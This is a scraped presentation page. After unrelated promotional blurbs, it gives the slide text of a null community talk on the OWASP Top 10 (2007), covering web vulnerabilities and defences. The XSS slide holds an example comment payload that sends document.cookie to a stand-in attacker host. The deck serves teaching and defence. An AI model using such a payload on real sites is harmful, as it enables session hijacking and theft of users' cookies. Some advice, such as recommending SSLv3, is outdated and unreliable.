The MCP (Model Context Protocol) is a framework designed to manage context and interaction within complex systems. This SlideShare presentation will provide a detailed overview of the MCP Model, its applications, and how it plays a crucial role in improving communication and decision-making in distributed systems. We will explore the key concepts behind the protocol, including the importance of context, data management, and how this model enhances system adaptability and responsiveness. Ideal for software developers, system architects, and IT professionals, this presentation will offer valuable insights into how the MCP Model can streamline workflows, improve efficiency, and create more intuitive systems for a wide range of use cases.
Mobile App Development Company in Saudi ArabiaSteve Jonas
EmizenTech is a globally recognized software development company, proudly serving businesses since 2013. With over 11+ years of industry experience and a team of 200+ skilled professionals, we have successfully delivered 1200+ projects across various sectors. As a leading Mobile App Development Company In Saudi Arabia we offer end-to-end solutions for iOS, Android, and cross-platform applications. Our apps are known for their user-friendly interfaces, scalability, high performance, and strong security features. We tailor each mobile application to meet the unique needs of different industries, ensuring a seamless user experience. EmizenTech is committed to turning your vision into a powerful digital product that drives growth, innovation, and long-term success in the competitive mobile landscape of Saudi Arabia.
Mobile App Development Company in Saudi ArabiaSteve Jonas
Application Security Vulnerabilities: OWASP Top 10 -2007
2. About us:
Vaibhav Gupta
Current: Security Researcher @ Adobe
Past: Senior Information Security Engg. @ Fortune 500
Sandeep Singh
Current: Security Analyst @ Dell
Past: Independent Security Consultant
And…we are Delhi chapter leaders for
Null – The Open Security Community (What is this??)
2
3. null – the open Security community
Open Security Community (Not for Profit Registered)
Local chapters in various cities
Comprised of Security Professionals & Enthusiasts
Knowledge & Information Sharing Platform
** Not a Training Institution
** Not a bunch of hackers/anarchists always talking about
breaking systems
** Not an underground community
3
4. Participate
How can I become a member of null?
Join Mailing List (http://groups.google.com/group/null-co-in)
Participate in Discussion on Mailing Lists
Attend Monthly meets
How do I participate?
Attend/Speak at Monthly meets
Conduct full day workshops(Humla/Bachaav/Puliya)
Spread the word
4
5. Introduction
Purpose of Session:
- Provide Overview Web Application Security Threats and
Defense
Using the Open Web Application Security Project (OWASP) “2007
Top Ten List,” we will:
- Define the vulnerabilities
- Illustrate the Web Application vulnerabilities
- Explain how to protect against the vulnerabilities
5
6. Credits and References
2 Documents copyrighted by the Open Web Application Security
Project, and freely downloaded from www.owasp.org.
OWASP 2007 Top Ten is titled "The Ten Most Critical Web
Application Security Vulnerabilities" 2007 update.
http://www.owasp.org/index.php/Top_10_2007
The OWASP Guide is titled "A Guide to Building Secure Web
Applications" 2.0.1 Black Hat Edition, July 2005
http://www.owasp.org/index.php/OWASP_Guide_Project
6
7. What is Web Application Security?
Not Network Security
Securing the “custom code” that drives a web application
Securing libraries
Securing backend systems
Securing web and application servers
Network Security Mostly Ignores the Contents of HTTP Traffic
Firewalls, SSL, Intrusion Detection Systems, Operating System
Hardening, Database Hardening
7
8. http://aspectsecurity.com/topten
What is an OWASP?
Open Web Application Security Project
http://www.owasp.org
Open group focused on understanding and improving
the security of web applications and web services!
Hundreds of volunteer experts from around the world
Top Ten Project
Raise awareness with a simple message
Lead by Aspect Security
9. How Bad Is It?
Bad
9
**Web Application Security Consortium (WASC)
http://www.webappsec.org/projects/statistics/
(Server-side Include)
11. OWASP Top Ten List
A1. Cross-Site Scripting (XSS)
A2. Injections Flaws
A3. Malicious File Execution
A4. Insecure Direct Object Reference
A5. Cross Site Request Forgery (CSRF)
A6. Information Leakage & Improper Error Handling
A7. Broken Authentication & Session Management
A8. Insecure Cryptographic Storage
A9. Insecure Communications
A10. Failure to Restrict URL Access
11
12. Your Code is Part of Your Security Perimeter
12
Firewall
Hardened OS
Web Server
App Server
Firewall
Databases
LegacySystems
WebServices
Directories
HumanResrcs
Billing
Custom Developed
Application Code
APPLICATION
ATTACK
You can’t use network layer protection (firewall, SSL, IDS, hardening)
to stop or detect application layer attacks
NetworkLayerApplicationLayer
Your security “perimeter” has huge
holes at the application layer
13. A1. Cross-Site Scripting (XSS) Flaws
OWASP Definition
XSS flaws occur whenever an application takes user supplied
data and sends it to a web browser without first validating or
encoding that content. XSS allows attackers to execute script in
the victim's browser which can hijack user sessions, deface web
sites, possibly introduce worms, etc.
13
14. A1. Cross-Site Scripting (XSS) Attacks
3 Categories of XSS attacks:
Stored - the injected code is permanently stored
(in a database, message forum, visitor log, etc.)
Reflected - attacks that are reflected take some other route to the
victim (through an e-mail message, or bounced off from some other
server)
DOM injection – Injected code manipulates sites javascript code or
variables, rather than HTML objects.
Example Comment embedded with JavaScript
comment=“Nice site! <SCRIPT> window.open(
http://badguy.com/info.pl?document.cookie
</SCRIPT>
14
15. A1. Cross-Site Scripting (XSS)
Occurs when an attacker can manipulate a Web application to send
malicious scripts to a third party.
This is usually done when there is a location that arbitrary content can
be entered into (such as an e-mail message, or free text field for
example) and then referenced by the target of the attack.
The attack typically takes the form of an HTML tag (frequently a
hyperlink) that contains malicious scripting (often JavaScript).
The target of the attack trusts the Web application and thus XSS
attacks exploit that trust to do things that would not normally be
allowed.
The use of Unicode and other methods of encoding the malicious
portion of the tag are often used so the request looks less suspicious
to the target user or to evade IDS/IPS.
15
16. XSS - Protection
Protect your application from XSS attacks
Filter output by converting text/data which might have dangerous
HTML characters to its encoded format:
'<' and '>' to '<' and '>’
'(' and ')' to '(' and ')’
'#' and '&' to '#' and '&‘
Recommend filtering on input as much as possible. (some data
may need to allow special characters.)
16
17. A2. Injections Flaws
OWASP Definition:
Injection flaws, particularly SQL injection, are common in web
applications. Injection occurs when user-supplied data is sent to
an interpreter as part of a command or query. The attacker’s
hostile data tricks the interpreter into executing unintended
commands or changing data.
17
18. A2. Injections Flaws
Some common types of command injection flaws include:
SQL injection (malicious calls to backend databases via SQL),
using shell commands to run external programs
Using system calls to in turn make calls to the operating
system.
Any Web application that relies on the use of an interpreter has the
potential to fall victim to this type of flaw
18
19. A2. Injections Flaws: Protection
Use language specific libraries to perform the same functions as shell
commands and system calls
Check for existing reusable libraries to validate input, and safely
perform system functions, or develop your own.
Perform design and code reviews on the reusable libraries to ensure
security.
Other common methods of protection include:
Use stored Procedures
Data validation (to ensure input isn't malicious code),
Run commands with very minimal privileges
If the application is compromised, the damage will be minimized.
19
20. A3. Malicious File Execution
OWASP Definition:
Code vulnerable to remote file inclusion (RFI) allows attackers
to include hostile code and data, resulting in devastating
attacks, such as total server compromise.
Malicious file execution attacks affect PHP, XML and any
framework which accepts filenames or files from users.
20
21. A3. Malicious File Execution
Applications which allow the user to provide a
filename, or part of a filename are often vulnerable if
input is not carefully validated.
Allowing the attacker to manipulate the filename may
cause application to execute a system program or
external URL.
Applications which allow file uploads have additional
risks
Place executable code into the application
Replace a Session file, log file or authentication token
21
22. A3. Malicious File Execution Protection
Do not allow user input to be used for any part of a file or
path name.
Where user input must influence a file name or URL, use a
fully enumerated list to positively validate the value.
File uploads have to be done VERY carefully.
Only allow uploads to a path outside of the webroot so it can not
be executed
Validate the file name provided so that a directory path is not
included.
Implement or enable sandbox or chroot controls which limit the
applications access to files.
22
23. A4. Insecure Direct Object Reference
OWASP Definition:
A direct object reference occurs when a developer exposes a
reference to an internal implementation object, such as a file,
directory, database record, or key, as a URL or form parameter.
Attackers can manipulate those references to access other
objects without authorization.
23
24. A4. Insecure Direct Object Reference
Applications often expose internal objects, making
them accessible via parameters.
When those objects are exposed, the attacker may
manipulate unauthorized objects, if proper access
controls are not in place.
Internal Objects might include
Files or Directories
URLs
Database key, such as acct_no, group_id etc.
Other database object names such as table name
24
25. A4. Insecure Direct Object Reference Protection
Do not expose direct objects via parameters
Use an indirect mapping which is simple to validate.
Consider using a mapped numeric range, file=1 or 2 …
Re-verify authorization at every reference.
For example:
1. Application provided an initial lists of only the
authorized options.
2. When user’s option is “submitted” as a parameter,
authorization must be checked again.
25
26. A5. Cross Site Request Forgery (CSRF)
OWASP Definition:
A CSRF attack forces a logged-on victim’s browser to send a
pre-authenticated request to a vulnerable web application,
which then forces the victim’s browser to perform a hostile
action to the benefit of the attacker. CSRF can be as powerful
as the web application that it attacks.
26
27. A5. Cross Site Request Forgery (CSRF)
Applications are vulnerable if any of following:
Does not re-verify authorization of action
Default login/password will authorize action
Action will be authorized based only on credentials
which are automatically submitted by the browser such
as session cookie, Kerberos token, basic authentication,
or SSL certificate etc.
27
28. A5. Cross Site Request Forgery (CSRF) Protection
Eliminate any Cross Site Scripting vulnerabilities
Not all CSRF attacks require XSS
However XSS is a major channel for delivery of CSRF
attacks
Generate unique random tokens for each form or URL,
which are not automatically transmitted by the
browser.
Do not allow GET requests for sensitive actions.
For sensitive actions, re-authenticate or digitally sign
the transaction.
28
29. A6. Information Leakage & Improper Error Handling
OWASP Definition:
Applications can unintentionally leak information about their
configuration, internal workings, or violate privacy through a
variety of application problems. Attackers use this weakness to
steal sensitive data or conduct more serious attacks.
29
30. Improper Error Handling: Protection
Prevent display of detailed internal error messages including stack
traces, messages with database or table names, protocols, and other
error codes. (This can provide attackers clues as to potential flaws.)
Good error handling systems should always enforce the security
scheme in place while still being able to handle any feasible input.
Provide short error messages to the user while logging detailed error
information to an internal log file.
Diagnostic information is available to site maintainers
Vague messages indicating an internal failure provided to the
users
Provide just enough information to allow what is reported by the user
to be able to linked the internal error logs. For example: System Time-
stamp, client IP address, and URL
30
31. Information Leakage - Example
Sensitive information can be leaked very subtlety
Very Common Example - Account Harvesting
App. responds differently to a valid user name with an invalid password,
then it would to a invalid user name
Web application discloses which logins are valid vs. which are invalid,
and allows accounts to be guessed and harvested.
Provides the attacker with an important initial piece of information, which
may then be followed with password guessing.
Difference in the Web App response may be:
Intentional (Easier to for users to tell then the account name is wrong)
Different code included in URL, or in a hidden field
Any minor difference in the HTML is sufficient
Differences in timing are also common and may be used!
31
32. Information Leakage: Protections
Ensure sensitive responses with multiple outcomes
return identical results
Save the the different responses and diff the html, the
http headers & URL.
Ensure error messages are returned in roughly the
same time or consider imposing a random wait time
for all transactions to hide this detail from the
attacker.
32
33. A7. Broken Authentication and Session Management
OWASP Definition:
Account credentials and session tokens are often not properly
protected. Attackers compromise passwords, keys, or
authentication tokens to assume other users’ identities.
33
34. Session Management
HTTP/S protocol does not provide tracking of a users session.
Session tracking answers the question:
After a user authenticates how does the server associate
subsequent requests to the authenticated user?
Typically, web application vendors provide a built-in session
tracking, which is good if used properly.
Often developers will make the mistake of inventing their own
session tracking.
34
35. Session Management (Session IDs)
A Session ID
Unique to the User
Used for only one authenticated session
Generated by the server
Sent to the client as
Hidden variable,
HTTP cookie,
URL query string (not a good practice)
The user is expected to send back the same ID in the next
request.
35
36. Session Management (Session Hijacking)
Session ID is disclosed or is guessed.
An attacker using the same session ID has the same privileges as
the real user.
Especially useful to an attacker if the session is privileged.
Allows initial access to the web application to be combined with
other attacks.
36
37. Session Management: Protection
Use long complex random session ID that cannot be guessed.
Protect the transmission and storage of the Session ID to prevent
disclosure and hijacking.
A URL query string should not be used for Session ID or any
User/Session information
URL is stored in browser cache
Logged via Web proxies and stored in the proxy cache
37
38. Session Management: Protection
Entire session should be transmitted via HTTPS to prevent
disclosure of the session ID. (not just the authentication)
Avoid or protect any session information transmitted to/from the
client.
Session ID should expire and/or time-out on the Server when
idle or on logout.
Client side cookie expirations useful, but should not be trusted.
Consider regenerating a new session upon successful
authentication or privilege level change.
38
39. Broken Account Management
Even valid authentication schemes can be undermined by flawed
account management functions including:
Account update
Forgotten password recovery or reset
Change password, and other similar functions
39
40. Broken Account and Session Management: Protection
Password Change Controls - require users to provide both old
and new passwords
Forgotten Password Controls - if forgotten passwords are
emailed to users, they should be required to re-authenticate
whenever they attempt to change their email address.
Password Strength - require at least 7 characters, with letters,
numbers, and special characters both upper case and lower
case.
Password Expiration - Users must change passwords every 90
days, and administrators every 30 days.
40
41. Broken Account and Session Management: Protection
Password Storage - never store passwords in plain text. Passwords
should always be stored in either hashed (preferred) or encrypted form.
Protecting Credentials in Transit - to prevent "man-in-the-middle"
attacks the entire authenticated session / transaction should be encrypted
SSLv3 or TLSv1
Man-in-the-middle attacks - are still possible with SSL if users disable or
ignore warnings about invalid SSL certificates.
Replay attacks - Transformations such as hashing on the client side
provide little protection as the hashed version can simply be intercepted
and retransmitted so that the actual plain text password is not needed.
41
42. A8. Insecure Cryptographic Storage
OWASP Definition:
Web applications rarely use cryptographic functions properly to
protect data and credentials. Attackers use weakly protected
data to conduct identity theft and other crimes, such as credit
card fraud.
42
43. A8. Insecure Cryptographic Storage
The majority of Web applications in use today need to store
sensitive information (passwords, credit card numbers, proprietary
information, etc.) in a secure fashion.
The use of encryption has become relatively easy for developers
to incorporate.
Proper utilization of cryptography, however, can remain elusive by
developers overestimating the protection provided by encryption,
and underestimating the difficulties of proper implementation and
protecting the keys.
43
44. Insecure Cryptographic Storage: Common Mistakes
Improper/insecure storage of passwords, certifications, and keys
Poor choice of algorithm
Poor source of randomness for initialization vectors
Attempting to develop a new encryption scheme "in house”
(Always a BAD idea)
Failure to provide functionality to change encryption keys
44
45. Insecure Cryptographic Storage: Protection
Avoiding storing sensitive information when possible
Use only approved standard algorithms
Use platform specific approved storage mechanisms
Ask, read and learn about coding Best Practices for your
platform
Careful review of all system designs
Source code reviews
45
46. A9. Insecure Communications
OWASP Definition:
Applications frequently fail to encrypt network traffic when it is
necessary to protect sensitive communications.
46
47. Insecure Communications
Failure to encrypt network traffic leaves the information available
to be sniffed from any compromised system/device on the
network.
Switched networks do not provide adequate protection.
47
48. Insecure Communications: Protection
Use SSL/TLS for ALL connections that are authenticated
or transmitting sensitive information
Use SSL/TLS for mid-tier and internal network
communications between Web Server, Application and
database.
Configure Desktop Clients and Servers to ensure only
SSLv3 and TLSv1 are used with strong ciphers.
Use only valid trusted SSL/TLS certificates and train
users to expect valid certificates to prevent Man-in-the-
Middle attacks.
48
49. A10. Failure to Restrict URL Access
OWASP Definition:
Frequently, an application only protects sensitive functionality
by preventing the display of links or URLs to unauthorized
users. Attackers can use this weakness to access and perform
unauthorized operations by accessing those URLs directly.
49
50. A10. Failure to Restrict URL Access
When the application fails to restrict access to administrative
URLs, the attacker can access normally unauthorized areas by
type in the URL’s into the browser.
Surprisingly common, for example:
add_account_form.php - checks for admin access before
displaying the form.
Form then posts to add_acct.php which does the work, but doesn’t
check for admin privileges!
Consistent URL access control has to be carefully designed.
50
51. A10. Failure to Restrict URL Access : Protection
Start Early!
Create an application specific security policy during the
requirements phase.
Document user roles as well as what functions and content each
role is authorized to access.
Specifying access requirements up front allows simplification of
the design
If your access control is not simple it won't be secure.
51
52. A10. Failure to Restrict URL Access: Protection
Test Thoroughly!
Conduct extensive regression testing to ensure the access control
scheme cannot be bypassed
Test all invalid access attempts as well as valid access.
Don't follow the normal application flow.
Verify that all aspects of user management have been taken under
consideration including scalability and maintainability.
52
53. Summary
Application Security starts with the Architecture and Design
Security can’t be added on later without re-designing and
rewriting
Custom code often introduces vulnerabilities
Application vulnerabilities are NOT prevented by traditional
security controls.
Don’t invent your own security controls
Design, Design, Design, code, test, test, test
53